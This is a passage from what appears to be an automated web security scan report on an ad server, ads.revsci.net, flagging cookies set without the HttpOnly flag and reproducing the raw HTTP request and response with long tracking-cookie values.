7WrqjfyaJPuccYQD7TePGOkimvBWYpr5L/v/QyizoH9meVTWi6dRzhN0m1heyLXklt5fGolHapV9oeLHM7xjsUlCqx25M8/TSXbOxRcB9wuo4mkx54fr3uZ5+IztDaJPZZrnjmdq2wTbqAnFM26pu7ZNroTeytAhwo7Mi8bkixlmX5tOZxA0YhXMy8F8uBV3KugjxyrMJwHyL6x+Nblik54TVfC7rPoaGGR43dnWTo/6WSxy/Q7pj2OuYQ+9dW8p/thpb3uDDrU2n1wgGqtUfiuDu0d8NZEnIHyx1xoZ7Ylsyr/zUhY9J9E2Y5+FKeLCPynmSO2JAPqyQoYOu8FGoKrega/u2oRX/OfXTIey3FuMGXvqHUCssSKvCRTsk7Ovn59on47gEK/Td4toCcsKdS9uYCFjSH2lDfycy2EBbgygNj9+viTUeQEr3J3ZCcKo+AfTPML120i8JoY1++jP2G1Wusiz6de2/ptcZ7nQrnuZIoigTnogy4x113ZhngplXswlPKGYpQwJSP+P8bvxeDHIjttT1E+qm6PcLam1zhbejeX7OSy2qJm++xUANxHgutR5ZXiYpxPSFZLfcICJ5L7laPyr157CRWJbCK8H6vrfcy2f/o13YfRFaEHY3DpHtoSjfuFRDFtsVGeFT8ZaK944kAnpumATg7EBF6iVt+eIKekOV3AMhh3HKj7pVmX7BNqICrqBeEuj78bNVsXfmbNWi+Os/PNpEGVTEDpLVVi/2347+IXMYA029QAZa1iaHCvuT9BZzN+Yj65kpzwf8uZ6Ucxz0PAULh44X02cLoVPseurv2PwWAaP0eLU+g/EyP8He9td+dZQjGtw7Nh1fDQCo/tsKshlDBAIUW6/sXO9uVGPBDhDb7f5XcKXmqrrwv/yPXMJ546MFRXdseNbk1XpnWu0akcZwnML/AsnkI56S3Iytgm1dkcVYSvrI9EnDw7HxjcpRnJd3JmcF0fxpEzHf8Wl3zzVL4m+u0XYmkrKMgWyWfeUxEdGJlBtjbASzKkYku5fPIeObLSHFOvCGQybWeolrA3ymr5iBVyOS78O3mvlZlRE2EVVUJJ5MtbDmtkU38lS1HhBtdJqRfnQ8S9wBjv+NgSN6HyVKHDBtHcqUAZlgx87FMORzGNMd9H9m0wU+vX/jdOAcNHbe8iYoNM20UTEOvLtXZZ4qz05II60CBtZjglarFbDpzgrCcDNeT/JTi/FjFcW7bMgG5wkCwiBhUSaR7rNX7n9HgkMpE4YnIsPYdxAWsMlLICoMU4smE="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:33:32 GMT
Content-Length: 2449

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
9.23. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715966-1009491-665981-317325-1198035-481602-1096170-74560-1264419-926097-107089-1096152-1063912-1063916-1166710-1063911-1063910-1246035-1246037-1246036-1023315-75921-86237-617983-1201817-1086731-1086733-1284585-124865-641525-1044410-1077940-1093100-613349-1009462-1044578-1041270-1093092-1093093-596293-576685-596292-596291-1044587-1009698-703456-621393-1268392-1049794-1238051-185980-770484-757774-1086373-593881-1215295-1086372-1196055-1086371-1236954-1086370-1086369-1196051-1236953-1236950-1147048-1236951-1049851-1076406-588118-1090723-1215322-1009546-715901-725071-715883-109108-1081817-1224040-1006093-1006089-1009578-1191521-1049785-1092989-1049788-1010298-397181-397180-672502-1010301-1146866-1020427-1049769-1049770-1049772 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==; rsiPus_ujqo="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+Atwis1ELtJdrj4R8jRRkHy362Kg9l9j12Fne8dMQJZUXWmSdO5nwhjxWdV4Kc+ZjwDWyB3QMjJ4fF+m9lVo3qnvZVw4LutWRkL22Hw4Kz6k0cFJN0i2ZvAbE7Bstv7fR0SabeL+ZpICwVpx/u0HdlAUDc7lBUsfbQGZgZL0dTqOST8wX+PhUN1bZVgcaXGzTvtwVFXKYB2I3CNvw5vwJcg2LzV80dREIWCFz+RSmIHpscvV6HL3O21RAGNtSP9eKQiAqmxufZrUZtvKGTbQ4OUPapeYisBn/mLyG+DnrXih7YstoaXSNXNyBw9tnu/kYZ2Wy8ugsYdZdg79OiSRnJpTdWxYyMt5odORpHaCcTsLhgkMx+XFx0NxPpHWWMAviDZpD0+2ZoVe81SFPEBm3tp9yfV7bk5TiayC92SSkcgbZwy4cnmVqKB1ZG8TpmtgVwdnUNuLPq/2hXZ1A7Tf5+ubEWjoHbM9bi/yeQgVBOLh/6/UIjd4TnzEQCQOhk2wNe7pWzhqvI+5X8Cqmdvu6tpVa7C+Nk6GnfGUcGt8PFuFkcJ4tfVffnafOFFkLT1PebdMfm+f7hgIjxjRnkEBAUd4Fdp1eVbRfHnggvjmoPJwywKL7UxyIW//r3C7XOcp2c+yZ3MmMzd4W8THoM/Lw2eBqcUGUAYA2HLPurkH25Rs928sz4FlT5nUB9yXKc45760A7dHuQmUrDhIZleDb2rHzVChRvJNfuMCvH4iu6x+Irn3VJOuyy8lpbyeOR0wRziDxiiKjApW5nTVuxGG0RszGW7rAw7zvFLmiOwMfhEok8Cv90GF6Z0B10Fk8uIHCKCDzV87TdQHUFyTYmzoO34HXLt261b4BNW7ml1nYlv6e39/Gn44aib/c1kb7tHnM+/JPsM7LiVmw3tGtbWIJiaZ+VLboWASTqxZUKhSbzk2s3hi2ngwzW04eEE+RFHRAV1AYVJUXrhRtK3yminctNkCVsQ3O/MonDQRvrY0zxZSFczNaLVfhEV3c2j5zNjp/154CvaHZdLa5M4QL0vDFSyslWGvxs13V5K8zoAQ7fXdIvu4gsY2pns2QyHQZ7oeS1FLsVa3QsqgRlPg+JJ2saXdJqe7hQZrzxfflyM60fA1SOkpM2UeuKkfrkhm14zhLHX3UBJ+6rY1WiZ9Kb3WsWx18RnkyX9hDtKk1ZcU9hmLPQjUstFZuV3vNJnO9eRadVgNGKD2nQQYghU1ZjZY2pPjItsnAco2oRRh7KAph2R4qy5kWFJEYjfrXIV5ow0VrekoHWL2s+EXgOaxc1cBJteHWs9iiLH4PhG0Hv/ES/wVObzmPW+72HqcTdMEaeaJerLU="; rsi_us_1000000="pUMV4x9HOCYc7H2Hdyd9gGYQxP6z87yv1/38fIfxXZ6hwopPJc1FCSfeEyinowUDu/6bHU/fppSZT968mAptVLd0gbR5UmTQx7YoMtsHUFy++96sia434M7cM6z8EDegCG0sJZJi2jDtzdF4Bo9ZEBaq7bUCfOnAlu2nto+pv7eVoA2lQLC4rSCbUn4f3OIOO9UPbm75nLJpjm/LzlQbrc2B3h7Ks3L+GK58JHL35KxtgSGRMVLv2jEjbDneecAAFdo+jT5YLix73R4OU6xpNVAlKXCKMxIbWoxbnl9NNfIUcezUALRReb4lPzpTmIJXGt8o8VyiAFcOKaf7Cll7pouSTtxLa808q4zjl3Si+70znE5U9HGXN9e0bM1nS8X3BVzvsR4lH1I0UVdEYSl8FssU6pOavCj/jzZ8dH93xxZ1kQqIfCzSdlAImPmYeIDywPZWHS4/c8M6xWdp3AS2760efiUUGVEja50v2Mgdj+FhNbzJBr6jjaLG1xPfKfiYRzGLqQJv70zj6yMXZOtcf2K6F8EPs02PSCRo8maGxM3jEqHlTBdWI15Ded0AEwZ+ldfwdW7LFpv9cYbjbVEGAEuNOw+jcfmaBErhNtUI56iyeKcMmZyqPjA/GY3kHS89R6I7UAgPbcSex8A2bvfG9m5WaangtU32B7+q0hZCsarOYUL5Qqt4HD5zctFUakMYCKNLuU58Vu0Y5jaiLe+2D5x69In9bkhvruS2v380SNEpf5JBLUF0UsgSyrb8SZUsFVBnCQz7podYm58A+PYHGpfwJjo8BJ1pEcK+39KU/V8qlF3czYQjVBMh5D3kw60Q1MaNZ06jJjhCdUiHRG2J4o/WKdmjurh9K2FQ41UexDSAIOxv2Gaj5B+DRmLckXKLc0IP7lV2qMc6F87RbtjjbqYCcRlS+1ZH6mGyDHaWyuRCm00rSJecxBBvf0OPGpaCt9rVDd5dC/apsRL18RnFeIEyp/3XM/Gc5Ad+fCgwcLqZQhNpb6Fxfn4q+D5YqrCgOvn6wVSbMsu1vuGHJmkjQrqwww9McBQBTyZQcfFJRejePaisI3pQASyehBE7EGo6WueN8TUdxTLZBZgJu4q7ylaocHjz3Yr2gGEohYG2D8NUJGQGY4tr2iWNO9B55kC6k+7phvae1BkP3V7IhltGq+ELTDsmYocV0YjzeXdSF/YD8e+YLB64MJcSTsig9Ldov8j7LyNfbPTQRF1NbfrSChWzM0cYu7WH82kA4CkLjOvAO5+XXThBqtKAwLVYsJReui/62jgOhOiO1SbxXRYvQgxUJG/2bwdGIx7xXGzYZxQrbm1Lgiq4sduZppPZJ+nHQ+jUO9TSAQqvBl6UErn8jCzQZMbe7MEhaqGO3sVg26k1sDHTMFugNKMbDnN0uiTvOQcy+YZ4SmONcbnTSJfNfN67BozcnNAf58eVd7rSAhG9q/tZkXUcqfkb0e3zx/7oyEKj7iyxN80Dr8ekHicYqp6nkydKw7W2L0yb5WDCn0+nz1vNALBSOlQg6z4gxabk3UTASDt6JqWJ9LhG0M7EJSG9GIUCKhh+Tn9QvE1nsV53rQsn5MFjFO/kVSzk/YVCbflod3UGhyrThMVAyqh/vec+xYJDvVaM+vjUDtFG8BGKdfF3Sux0ymaiZV6jOEckNKL4C73eZB/Y+bi9yHR+zjJEUKqTo9Dil9dLFzGGpLbt5+sM+I3yvcm8JAU2PiR745PmrLrVRU6EJyGuFH3tsRHMkw+hS2Uf+JnP113fUmTGhYLsXE4DR1HMD9ALfpUs0ymAJLmRxfquWg3yLE25bUXhK98K4A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ujqo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ujqo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vb1g="MLsXrrMO5Bpv55C26taiZ2b5rkKgtP29EMOeggN9tKCDiZO6EZttNm2XYivlRGvJx3wqeAcA7jRrX4KAU1K7A+k+BscDKqs11h5Ln0AGZdNAlKE21PnezAF0Vpa5nplUgoeT1FkEjUwn10WWQForqzNGcfW5TT3ZB21+K1p411cIWT4MENrJ2pcdkQJJr3Te0YRraIEpF2JL+sMwpVvzcHUbT35biZ2A4aCHV9gMOKS1C2x9rftcj9mccnaZl2FYiNxhYz0QS38eu+VXwOFkazU8VjBCWNx1ZFw2fyX1m8R5aQ4iY2gCJDFu8RLdNYCC7w1qbrTYOKOE8PUiod0iYsBrL1GFw5Ht0ifSaSW9sWtuub5gKwqetVZtxjkIM6HTmsYEBo7GciEIyQNsBk0Kb8Dvf3EcEplIiYHdamRHYXp3iBgTveV2nLYyU0CktPZqfomOcRnHmzylTyZ/bDLb01GUdIYhaMOgNmSCQf1chYsURxKIM/3j6m5ZRgmh1r52/BLEUm5QCa9xdFYyQExfqXNm58P4Il75xiGlKRJNjCgGs+mh+gp1qMXnZJy6vwbAWCz8oMWYOiICBKJrm9afIK5fpsjmAuZCcyLPyWbVl0EMlSq3f3IELexr6T/MZR+f6FNumv71ZK9dkjyhk4zf5cVJpSb29HMy9LU3Mskc3QSLAdDJCZT/gCKl3vp4oZ4ESZKq9Ob50+hsIlZbNnEek7E4JOh3SH1Ykx5Ji53Dx2xXNC5mhEPkbfJN83+DG/3tr7WesXLZLn7TpK6guGpssajNpdORP6P3Lm11UlIoYug/2rsFhcU2949jD3nOqbvaqOsZ0GMceWN5pjtjfqrF6nacP2JBGF4lj6mOqvV7bxr8K+Q2r2S+DNbMzaD97dR2K14RfvAelQHrkfd+W1YUbUsViDUzo7TPe1pfXvjUqXqWcPDplzntcJfLdowiUIgmaM6DUQoQwzLmB6qNV89ZFw5zr7qb10x0VplTCf7H15GVtuQvaskbEEequlU5Ok7crxPpqTAZygnjMQiAD6/cGLfaunTD2PBStVJzRzvoknCy1TgVl1xu0OMO1vr0FmGkkU2TVvJYNgkCBmSickv2DCqEqueAGcPBPUrua+VljZwWD1re8JE0CsKffVFT5gqhDhfM8g9m33jTnkr6i0GqYvVAiPuZBIYSCXIrYt1m1NfoNo3SE/4Xhn/pQ695F6lxiFfSV2jzErph8AX0xQ4PLFBFqPmLn0mFK5abMNSSAtSO9JxRSl/eMklVw5vFuULphCBvQsbvCk+xocxTvtHgwoRNqb5IDgNOpen2sOJ///1Yl0FFVuxNPD1Tp3kfzXxs/UsQI0WRFYbvdxugerQVhpTUV0BcTxpNLUxM6yGwUeZymPUCP2b/KMoKxnDfQ7WJuczYg216QJ5mQr+0CPxRGnMwnlvsfheJVZDujCGK86Y+"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4y9DPxYULWF0UBr2EFb5ofBLgcZpb/18uFL7iZbWSISXnXYnxS1Z30ODwyG99mllFNM5gOZZ+JSCL2vuVvIWQhr6NZ1DrvOywE3pzfcw2pA6Na6mIl2PYMRQWVRvby8dTZXsi9L5bZyt2lL3gRXA2JXac7hVKrJQMkhIuN/bx0d3iXgSAZT7bMHNr5OGCdoBZpZ/XCmN0WbEd/6gsPiZZWXHU2K+jXM6z0XTAdE+auHBGf3OMT34oqTFz4ayUvSp357vxuHfkVVIHhiuMS08w0+rpUxmKjRf/qr1DQ390lGA+HXk4ZvEzsJps5AwxHkQrsod7v0X8ptcasgHhiowYzqr1FPwLGIE9X/EIwSDQ2oEwikTXE/fBZTEk6cWzdecj8RN+zuXFwCHXuVL94I1N4Mr+5WWQGLdD4WCSVvD14dKUFDUvABxg45jZqv2EnC93LWw2If6eUuESWfyUCsLCBeAYNgdUOiUcEc/Ykr7ZHESGk+JUJMT34VcChM6NMFMJjbAuQ6dOLjyEzUGtj4D4XWxoAKe0iE4pUOWF4LHYA3FTo0+X+YN2dQbYThdxc2JBxnxhuziQixTq8BTHV05ETdhm8wDlmcczNX6Wq0EHUtQTKhRAMadeOhedQzxT6IZnsgSCjsF55I0rC1YNlfscATxOlgjr4fz/YDVwFhHAs8gJTPwzLlMlNDeSuLjGG5oi9xmTkSdP2naqhQrw9hatYL50RaMwmjtY0e5NjLP6IiRUeIbbzKpFAkK+Z4dcwfDXuQSmGQZCN3JhwYxsbCoo7pb+Gr6WymFn2KrnXU94SyjxIdt9mdXPtc3lTWM8ZhZJtuZCDdjw5WaK1B0qUCodwN9E3DEbhCGUoJ5iB5EuoPvZR/+R+JXL6KCXvceXi6MNjGZFKi4h715soaPvddSoRCUr8mgJQHBkeM5G7PhbH44azAP63pTli80JhEzHUvrGNkAlCkCUtfbQBOisgu+x55Os+I3Dn+PgzRFCC6ti9zrId6+eb8xwBHtMMur8k4098l2Su1XV4mJUK4sqSaCvq5MK+lqsTiXU/AkJcYqFSWonsN7+wTZtz+7bZMNQJa+1Srzh00menUxa81uoqrEomA0JmykSFQ2ZnMl5P4EQdVVquCRouQ43CTCqK8re6NPHBm2bf2BW5PNYo7tFTRSA+vTArAouLhHFgH6dL+kbG+Fq1bRboXp3nKHWqgcrrYwGhXbPXeRMqCkbPdxpIVh6uD9SIyimmegjH2Dgw8zXxivWOP4/v5BDDLosvO6qVIgHQVgeHVIjpgnFOWDpMKXcIr6gNlY1Z2LEMo0KdfufCmr93gBlGL69+JlRegZqgs8cYf++tAQxFiWl371PVfNDzB6DvH6MCtVt1jaFTcsJd+8AmVtyIXsHsfS8gJKkrQFmrR8QrCsOPP0LX3TSrYFuVapuFIg4840E/x1NLwrT+ZrCiVLqVUPDwL80/joKpgcV4SEzDcFsxxZ/KeAVXjyVJXZMXi5+fxbpYCfWFEwgv1Wsz+t